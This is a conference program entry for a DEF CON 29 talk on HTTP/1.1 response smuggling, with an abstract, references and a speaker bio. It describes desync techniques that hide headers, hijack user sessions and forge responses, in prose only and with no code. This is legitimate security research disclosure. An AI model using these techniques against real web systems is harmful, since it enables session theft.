Response Smuggling: Pwning HTTP/1.1 Connections

Presented at DEF CON 29 (2021), Aug. 6, 2021, 6 p.m. (45 minutes)

Over the past few years, we have seen some novel presentations re-introducing the concept of HTTP request smuggling, to reliably exploit complex landscapes and systems. With advanced techniques, researchers were able to bypass restrictions and breach the security of critical web applications. This presentation will take a new approach, focusing on the response pipeline desynchronization, a rather unexplored attack vector in HTTP Smuggling. First, I will introduce a Desync variant, using connection-tokens to hide arbitrary headers from the backend. This technique does not abuse discrepancy between HTTP parsers, but instead relies on a vulnerability in the protocol itself! The issue was found and reported under Google's Vulnerability Reward Program for a nice bounty! Next, I will show how it is possible to inject multiple messages at the backend server, mixing the pipeline's connection order, and hijack users sessions from login requests. Finally, using a novel technique known as Response Scripting, I will demonstrate how to create malicious outbound messages using static responses as the building blocks. This will be leveraged to write custom responses and take control of one of the most popular protocols in history! REFERENCES: RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1 RFC 7231: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content CHAIM LINHART, AMIT KLEIN, RONEN HELED, STEVE ORRIN: HTTP Request Smuggling James Kettle: HTTP Desync Attacks: Request Smuggling Reborn Emile Fugulin HTTP Desync Attacks with Python and AWS Amit Klein HTTP Request Smuggling in 2020


  • Martin Doyhenard - Security Researcher at Onapsis
    Martin is a security researcher at the Onapsis Research Labs. His work includes performing security assessment on SAP and Oracle products and detecting vulnerabilities in ERP systems. His research is focused on Web stack security, reverse engineering and binary analisis, and he is also an active CTF player. Martin has spoken at different conferences including RSA, Troopers, Hack In The Box and EkoParty and presented multiple critical vulnerabilities. @tincho_508


Similar Presentations: